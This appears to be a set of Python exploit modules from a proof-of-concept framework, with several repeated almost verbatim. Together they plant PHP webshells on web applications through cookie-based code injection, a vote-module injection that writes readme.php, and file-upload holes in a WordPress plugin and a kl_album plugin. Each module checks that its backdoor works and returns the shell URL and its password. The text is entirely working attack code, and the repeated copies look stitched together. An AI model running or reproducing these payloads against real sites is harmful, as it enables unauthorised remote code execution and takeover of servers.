def exploit(cls, args):
vul_url = args['options']['target']
shell_url = vul_url + '/inc/class_tester.php'
php = PhpShell()
cls.cookies['shutdown_functions[0][arguments][]'] = \
cls.cookies['shutdown_functions[0][arguments][]'].format(b64encode(php.get_content()))
if args['options']['verbose']:
print '[*] Request URL: ' + vul_url
print '[*] Payload Content: ' + cls.cookies['shutdown_functions[0][arguments][]']
requests.get(vul_url, cookies=cls.cookies)
if php.check(shell_url):
args['success'] = True
args['poc_ret']['vul_url'] = vul_url
args['poc_ret']['Webshell'] = shell_url
args['poc_ret']['Webshell_PWD'] = php.get_pwd()
return args
else:
args['success'] = False
return args
def exploit(cls, args):
vul_url = args['options']['target']
shell_url = vul_url + '/inc/class_tester.php'
php = PhpShell()
cls.cookies['shutdown_functions[0][arguments][]'] = \
cls.cookies['shutdown_functions[0][arguments][]'].format(b64encode(php.get_content()))
if args['options']['verbose']:
print '[*] Request URL: ' + vul_url
print '[*] Payload Content: ' + cls.cookies['shutdown_functions[0][arguments][]']
requests.get(vul_url, cookies=cls.cookies)
if php.check(shell_url):
args['success'] = True
args['poc_ret']['vul_url'] = vul_url
args['poc_ret']['Webshell'] = shell_url
args['poc_ret']['Webshell_PWD'] = php.get_pwd()
return args
else:
args['success'] = False
return args
def exploit(cls, args):
vul_url = args['options']['target']
php = PhpShell()
php._content = '<?php var_dump(md5(123));@assert($_REQUEST[{0}]);'
# You can set your own password with these two following ways:
# pwd = 'your_pwd'
# php.set_pwd(pwd)
# for more instructions, check these files in utils/payload/webshell
ids = cls.get_vote_links(args)
if ids:
for i in ids:
vul_path = '/index.php?m=vote&c=index&a=post&subjectid=%s&siteid=1' % str(i)
exploit_url = vul_url + vul_path
if args['options']['verbose']:
print '[*] Request URL: ' + exploit_url
payload = {
'subjectid': i,
'radio[]': ');fputs(fopen(base64_decode(cmVhZG1lLnBocA),w),'
'base64_decode(%s));\x80' % b64.b64encode(php.get_content()).replace('=', '')
}
requests.post(exploit_url, data=payload)
v_path = '/index.php?m=vote&c=index&a=result&subjectid=%s&siteid=1' % str(i)
requests.get(vul_url + v_path)
shell_url = vul_url + '/readme.php'
if php.check(shell_url):
args['success'] = True
args['poc_ret']['vul_url'] = vul_url
args['poc_ret']['Webshell'] = shell_url
args['poc_ret']['Webshell_PWD'] = php.get_pwd()
return args
else:
args['success'] = False
else:
args['success'] = False
return args
def exploit(cls, args):
vul_url = args["options"]["target"]
php = PhpShell()
php._content = "<?php var_dump(md5(123));@assert($_REQUEST[{0}]);"
# You can set your own password with these two following ways:
# pwd = 'your_pwd'
# php.set_pwd(pwd)
# for more instructions, check these files in utils/payload/webshell
ids = cls.get_vote_links(args)
if ids:
for i in ids:
vul_path = "/index.php?m=vote&c=index&a=post&subjectid=%s&siteid=1" % str(i)
exploit_url = vul_url + vul_path
if args["options"]["verbose"]:
print "[*] Request URL: " + exploit_url
payload = {
"subjectid": i,
"radio[]": ");fputs(fopen(base64_decode(cmVhZG1lLnBocA),w),"
"base64_decode(%s));\x80" % b64.b64encode(php.get_content()).replace("=", ""),
}
requests.post(exploit_url, data=payload)
v_path = "/index.php?m=vote&c=index&a=result&subjectid=%s&siteid=1" % str(i)
requests.get(vul_url + v_path)
shell_url = vul_url + "/readme.php"
if php.check(shell_url):
args["success"] = True
args["poc_ret"]["vul_url"] = vul_url
args["poc_ret"]["Webshell"] = shell_url
args["poc_ret"]["Webshell_PWD"] = php.get_pwd()
return args
else:
args["success"] = False
else:
args["success"] = False
return args
def exploit(cls, args):
vul_url = args['options']['target']
shell_url = vul_url + '/inc/class_tester.php'
php = PhpShell()
# You can set your own password with these two following ways:
# pwd = 'your_pwd'
# php = PhpShell(pwd=pwd)
# or
# php.set_pwd(pwd)
# for more instructions, check these files in utils/payload/webshell
cls.cookies['shutdown_functions[0][arguments][]'] = \
cls.cookies['shutdown_functions[0][arguments][]'].format(b64encode(php.get_content()))
if args['options']['verbose']:
print '[*] Request URL: ' + vul_url
print '[*] Payload Content: ' + cls.cookies['shutdown_functions[0][arguments][]']
requests.get(vul_url, cookies=cls.cookies)
if php.check(shell_url):
args['success'] = True
args['poc_ret']['vul_url'] = vul_url
args['poc_ret']['Webshell'] = shell_url
args['poc_ret']['Webshell_PWD'] = php.get_pwd() # or your own pwd if you've set it manually
return args
def exploit(cls, args):
url = args['options']['target']
vul_url = '%s/wordpress/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php' % url
php = PhpShell(pwd='sh4dow').get_content()
if args['options']['verbose']:
print '[*] Request url:' + vul_url
print '[*] Upload file:' + php
payload = {
'files': ('info.php', php, 'application/octet-stream'),
'action': 'upload'
}
requests.post(vul_url, files=payload)
file_path = '%s/wordpress/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/info.php' % url
if args['options']['verbose']:
print '[*] checking......'
r = requests.get(file_path)
if '202cb962ac59075b964b07152d234b70' in r.content:
args['success'] = True
args['poc_ret']['webshell'] = file_path
args['poc_ret']['password'] = '******'
return args
def exploit(cls, args):
url = args['options']['target']
verify_url = '%s/content/plugins/kl_album/kl_album_ajax_do.php' % url
php = PhpShell(pwd='bb2').get_content()
if args['options']['verbose']:
print '[*] Request URL: ' + verify_url
print '[*] Upload Shell: ' + php
verify_file = {'Filedata': ('v%27.php', php), 'album': (None, '11111')}
content = requests.post(verify_url, files=verify_file).content
try:
file_path = re.search("..(/content.*?\.php)", content).group(1)
except:
return args
# check
if args['options']['verbose']:
print '[*] Checking...'
check_content = requests.post(url + file_path).content
if '202cb962ac59075b964b07152d234b70' in check_content:
args['success'] = True
args['poc_ret']['webshell'] = url + file_path
args['poc_ret']['password'] = '******'
return args
def exploit(cls, args):
vul_url = args['options']['target']
php = PhpShell()
php._content = '<?php var_dump(md5(123));@assert($_REQUEST[{0}]);'
# You can set your own password with these two following ways:
# pwd = 'your_pwd'
# php.set_pwd(pwd)
# for more instructions, check these files in utils/payload/webshell
ids = cls.get_vote_links(args)
if ids:
for i in ids:
vul_path = '/index.php?m=vote&c=index&a=post&subjectid=%s&siteid=1' % str(
i)
exploit_url = vul_url + vul_path
if args['options']['verbose']:
print '[*] Request URL: ' + exploit_url
payload = {
'subjectid':
i,
'radio[]':
');fputs(fopen(base64_decode(cmVhZG1lLnBocA),w),'
'base64_decode(%s));\x80' %
b64.b64encode(php.get_content()).replace('=', '')
}
requests.post(exploit_url, data=payload)
v_path = '/index.php?m=vote&c=index&a=result&subjectid=%s&siteid=1' % str(
i)
requests.get(vul_url + v_path)
shell_url = vul_url + '/readme.php'
if php.check(shell_url):
args['success'] = True
args['poc_ret']['vul_url'] = vul_url
args['poc_ret']['Webshell'] = shell_url
args['poc_ret']['Webshell_PWD'] = php.get_pwd()
return args
else:
args['success'] = False
else:
args['success'] = False
return args
